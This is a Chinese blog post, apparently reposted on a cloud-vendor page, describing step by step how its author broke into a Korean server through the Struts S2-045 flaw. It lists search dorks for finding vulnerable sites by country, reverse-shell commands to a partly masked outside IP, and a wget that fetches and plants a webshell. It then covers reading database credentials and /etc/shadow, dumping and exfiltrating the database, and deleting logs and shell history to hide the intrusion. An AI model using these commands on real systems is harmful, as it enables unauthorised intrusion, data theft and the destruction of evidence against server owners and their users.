利用Strutss02-045漏洞快速渗透韩国某服务器

本文涉及的产品
云数据库 RDS MySQL Serverless,0.5-2RCU 50GB
简介:

Byantian365.com  simeon

Struts s02-045漏洞非常火爆,国内好多网站均是采用这种架构,下面就如何快速获取Linux服务器的权限进行分析和分享,在文章结尾部分高度浓缩渗透linux技巧和方法总结,欢迎大家拍砖!

1.获取URL地址

可以通过百度、zoomeyehttps://www.zoomeye.org/)和shadonhttps://www.shodan.io/)进行搜索,我目前整理了一些关键词:

enterprise.action

register.action

info.action

login.action

index.action

2.存在漏洞检测

还可以根据国家进行收集例如site:kr这是韩国网站你懂的收集到地址后直接在团队小伙伴修改的程序中进行检测如图1所示显示该网站存在漏洞。如果显示不是“Its vulnerable s2_045”则表明该网站已经修护或者不存在漏洞,就果断放弃吧!

                            wKioL1jEtEzxS05RAABMuH1eU2M694.jpg-wh_50

1检测漏洞是否存在

3.获取网站真实物理路径

  获取网站真实路径可以通过locatefindwhereis三个命令来实现,locate命令,前提是前期执行过updatedb命令,如果没有执行则直接执行updatedb命令后再执行。例如“locate *.jsp”可以获取所有的jsp文件名称和路径,如图2所示,会将所有的jsp文件给检索出来。

wKioL1jEtEzwUwa3AAC01IVJ_Qc518.jpg-wh_50

2使用locate命令检索jsp文件

有时候网站的jsp程序太多也无法快速定位,笔者摸索出来一个技巧,就是通过查看网站的独立文件,例如打开网页中的图片等文件,获取其名称后,再通过“locate prd01.jpg”命令来检索,会提高效率,如图3所示,直接减少到4条记录,通过跟网站对比。命令执行结果中可以判断网站正式路径就在下面两个中:

/home/root/ROOT_20160524/resource/images/kor/main/prd01.jpg

/home/root/ROOT_20160923/resource/images/eng/main/prd01.jpg

wKiom1jEtE2SqD4lAACCMHhPFqI492.jpg-wh_50

3使用locate检索图片文件

4.果断反弹shell

   使用bash -i >&/dev/tcp/59.110.xx.xxx/4433 0>&1或者/usr/bin/bash-i >& /dev/tcp/59.110.xx.xxx/4433 0>&1命令执行反弹,反弹IP地址59.110.xx.xxx,端口为4433,注意该IP是独立IP,且能监听4433端口。如图4所示。

wKiom1jEtE2hty10AABU7VgNMLU213.jpg-wh_50

4反弹到shell执行

5.下载Webshell到服务器

   使用命令“wgetO/home/root/ROOT_20160524/resource/images/a.jsphttp://218.1.xx.xx/tklama/1.txt”下载1.txt到目录“/home/root/ROOT_20160524/resource/images”并保存为a.jsp文件,如图5所示。

wKioL1jEtE2yWgUWAADSoQzR6KA975.jpg-wh_50

 

5下载Webshell到服务器

6.获取webshell

    在浏览器中访问http://203.xxx.xxx.xxx:8080/resource/images/a.jsp,如图6所示,顺利成功获取webshell

wKiom1jEtE6yRWeaAADLWdd267g173.jpg-wh_50

6获取Webshell

7.获取网站数据库配置信息

   网站数据库配置信息一般在WEB-INF/classes/db.properties,如图7所示,可以获取该网站所使用的数据库oracle的账号以及密码等信息,后续动作就不展开讨论了。

wKioL1jEtE7DqTFSAABt6iMZwKU150.jpg-wh_50

7获取数据库密码信息

8.渗透总结

1)使用关键字获取urlurl中一定要带有action,例如index.action,收集到的关键字:

enterprise.action

register.action

info.action

login.action

index.action

(2)搜索引擎

杜娘:http://www.baidu.com

zoomeye:https://www.zoomeye.org/

shodan :https://www.shodan.io/

google镜像:https://google.tse.moe/ https://g.hancel.net/

3)反弹监听服务器命令

bash -i>& /dev/tcp/59.110.xx.xxx/4433 0>&1

/usr/bin/bash -i >& /dev/tcp/59.110.xx.xxx/4433 0>&1

4)定位物理真实路径

 locate *.jsp locate logo.jpg

需要寻找网站独立的图片文件,js文件等。

5)下载并保持webshell

wget –O/home/site/antian365.com.jsp  http://218.1.xx.xxx/tklama/1.txt

6)获取密码哈希值

 cat /etc/shadow

7)查看数据库信息

locatedb.properties

locatejdbc*

locateWEB-INF

8)命令行下连接数据库

whereis Mysql

Mysql –hlocalhost–uroot –ppassword

9mysqldump –hlocalhost–uroot –ppassword somedb>somedb.sql

somedb数据导出为somedb.sql

10)压缩文件

tar –zcvfsomedb.tar.gz somedb.sql

/home/www目录下的所有文件打包到tmp目录

tar –zcvf  /tmp/somedb.tar.gz  /home/www/

移动somedb.tar.gz到站点目录/home/www/下:

mv/tmp/somedb.tar.gz /home/www/somedb.tar.gz

下载文件:

http://www.antian365.com/somedb.tar.gz

下载完毕删除文件,切记别乱删除文件。rm –rf文件名,是彻底删除某个文件

rm –rf/home/www/somedb.tar.gz

11)清除日志

rm -rf/var/log/access.log

rm -rf/var/log/wtmp

rm -rf/var/log/lastlog

rm -rf/var/log/secure*

rm -rf/root/.bash_history

rm -rf/root/.mysql_history

history –c

 

 欢迎加入安天365安全技术交流群(51383306)进行技术讨论,无关人员勿进!



 本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/1905542

相关实践学习
基于CentOS快速搭建LAMP环境
本教程介绍如何搭建LAMP环境,其中LAMP分别代表Linux、Apache、MySQL和PHP。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助     相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
相关文章
|
3月前
|
SQL 监控 安全
服务器安全性漏洞和常见攻击方式解析
服务器安全性漏洞和常见攻击方式解析
|
6月前
|
安全 Linux 数据安全/隐私保护
百度搜索:蓝易云【OpenVAS 检查 Linux 服务器漏洞教程!】
通过上述步骤,你可以在Linux服务器上使用OpenVAS进行漏洞检测。请注意,漏洞检测和扫描是一个复杂的过程,需要持续的更新和管理。建议参考OpenVAS的官方文档和用户指南,以了解更多关于配置和使用OpenVAS的详细信息。
103 0
百度搜索:蓝易云【OpenVAS 检查 Linux 服务器漏洞教程!】
|
28天前
|
安全 Java 数据中心
Confluence 数据中心和服务器中的严重漏洞 CVE-2023-22515
Confluence 的开发者 Atlassian 已承认此漏洞,并将其归类为损坏的访问控制问题。他们强调需要立即采取行动,并建议用户升级到最新版本以保护他们的系统。Atlassian 将该漏洞的严重级别评定为 Critical CVSS 10。
19 0
|
1月前
|
存储 固态存储 定位技术
韩国服务器与美国服务器性能对比
在进行服务器性能对比分析时,我们需要考虑多个因素,包括硬件配置、网络连接质量、数据中心的设施以及地理位置等
|
10月前
|
监控 安全 网络安全
服务器被专门针对零日漏洞的.locked勒索病毒攻击,数据能否恢复?
        近日,国内多家公司服务器感染了后缀.locked勒索病毒,公司的服务器文件全部被加密,急需数据恢复,否则公司运作无法进行,部分企业经联系数据恢复工程师远程查看,并沟通协商了相应的解决方案,通过双方远程协同配合,最终在当天顺利完整恢复数据。
256 0
服务器被专门针对零日漏洞的.locked勒索病毒攻击,数据能否恢复?
|
8月前
|
安全 网络安全 Apache
服务器漏洞修复之SSL/TLS协议信息泄露漏洞(CVE-2016-2183)
服务器漏洞修复之SSL/TLS协议信息泄露漏洞(CVE-2016-2183)
3582 0
|
存储 安全 Ubuntu
Linux服务器还有漏洞?建议使用 OpenVAS 日常检查!
Linux服务器还有漏洞?建议使用 OpenVAS 日常检查!
215 0
|
XML SQL 安全
【web渗透思路】敏感信息泄露(网站+用户+服务器)
【web渗透思路】敏感信息泄露(网站+用户+服务器)
526 0
【web渗透思路】敏感信息泄露(网站+用户+服务器)
|
SQL 缓存 JavaScript
【nodejs代理服务器一】nodejs http-proxy 开发反向代理服务器,防火墙,过滤常见的web渗透
【nodejs代理服务器一】nodejs http-proxy 开发反向代理服务器,防火墙,过滤常见的web渗透
472 0
【nodejs代理服务器一】nodejs http-proxy 开发反向代理服务器,防火墙,过滤常见的web渗透
|
安全 物联网 Java
新型 Linux 僵尸网络变种“EnemyBot”现身!利用 Web 服务器、Android 及 CMS 漏洞进行攻击
新型 Linux 僵尸网络变种“EnemyBot”现身!利用 Web 服务器、Android 及 CMS 漏洞进行攻击
221 0
新型 Linux 僵尸网络变种“EnemyBot”现身!利用 Web 服务器、Android 及 CMS 漏洞进行攻击

热门文章

最新文章